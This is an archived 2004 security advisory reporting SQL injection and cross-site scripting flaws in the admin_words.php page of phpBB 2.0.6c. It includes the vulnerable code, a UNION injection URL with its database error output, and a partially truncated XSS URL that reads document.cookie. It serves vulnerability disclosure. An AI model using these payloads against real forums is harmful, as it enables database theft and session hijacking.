Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web BBS :: Frequently Exploited :: hack2653.htm

phpBB 2.0.6c - Non-critical Sql injection and XSS bug



[waraxe-2004-SA#009 - Non-critical Sql injection and XSS bug in PhpBB 2.0.6c]







{================================================================================}

{                              [waraxe-2004-SA#009]                              }

{================================================================================}

{                                                                                }

{            [ Non-critical Sql injection and XSS bug in PhpBB 2.0.6c ]          }

{                                                                                }

{================================================================================}

                                                                                                                                

Author: Janek Vind "waraxe"

Date: 16. March 2004

Location: Estonia, Tartu







Affected software description:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



PhpBB is widely used and very popular forum software, written in php.

Homepage:  http://www.phpbb.com/ 





Vulnerabilities:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



Original code from  admin_words.php, $Id: admin_words.php,v 1.10.2.2 2002/05/12 15:57:45,

starting from line 74:



-------------------------------



if( $mode == "edit" )

		{

			if( $word_id )

			{

				$sql = "SELECT * 

					FROM " . WORDS_TABLE . " 

					WHERE word_id = $word_id";

				if(!$result = $db->sql_query($sql))

				{

					message_die(GENERAL_ERROR, "Could not query words table", "Error", __LINE__, __FILE__, $sql);

				}



				$word_info = $db->sql_fetchrow($result);

				$s_hidden_fields .= '';

			}

			else

			{

				message_die(GENERAL_MESSAGE, $lang['No_word_selected']);

			}

		}



--------------------------------



As we can see, parameter $word_id is submitted to sql query WITHOUT single quotes, therefore

it's possible sql injection, for example with UNION method:



 http://localhost/phpbb206c/admin/admin_words.php?mode=edit&id=-1 %20UNION%20ALL%20SELECT%20null/*



and we get error feedback:



------------------------------------------------



Error Could not query words table



DEBUG MODE



SQL Error : 1222 The used SELECT statements have a different number of columns



SELECT * FROM phpbb_words WHERE word_id = -1 UNION ALL SELECT null/*



Line : 83

File : D:\apache_wwwroot\phpbb206c\admin\admin_words.php



------------------------------------------------



By implementing so-called "blind" sql injection methods, we can pull out from sql database any

information. So why i'm categorizing this bug as "non-critical"? Because we need first log in as 

forum administrator to make successful attack. So it's not so "useful" security bug ;)

But let's think again - what, if we make such request:





http://localhost/phpbb206c/admin/admin_words.php?mode=edit&id=1 /*"><script>alert(document.cookie);come2waraxe@yahoo.com 

    Janek Vind "waraxe"



---------------------------------- [ EOF ] ------------------------------------


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH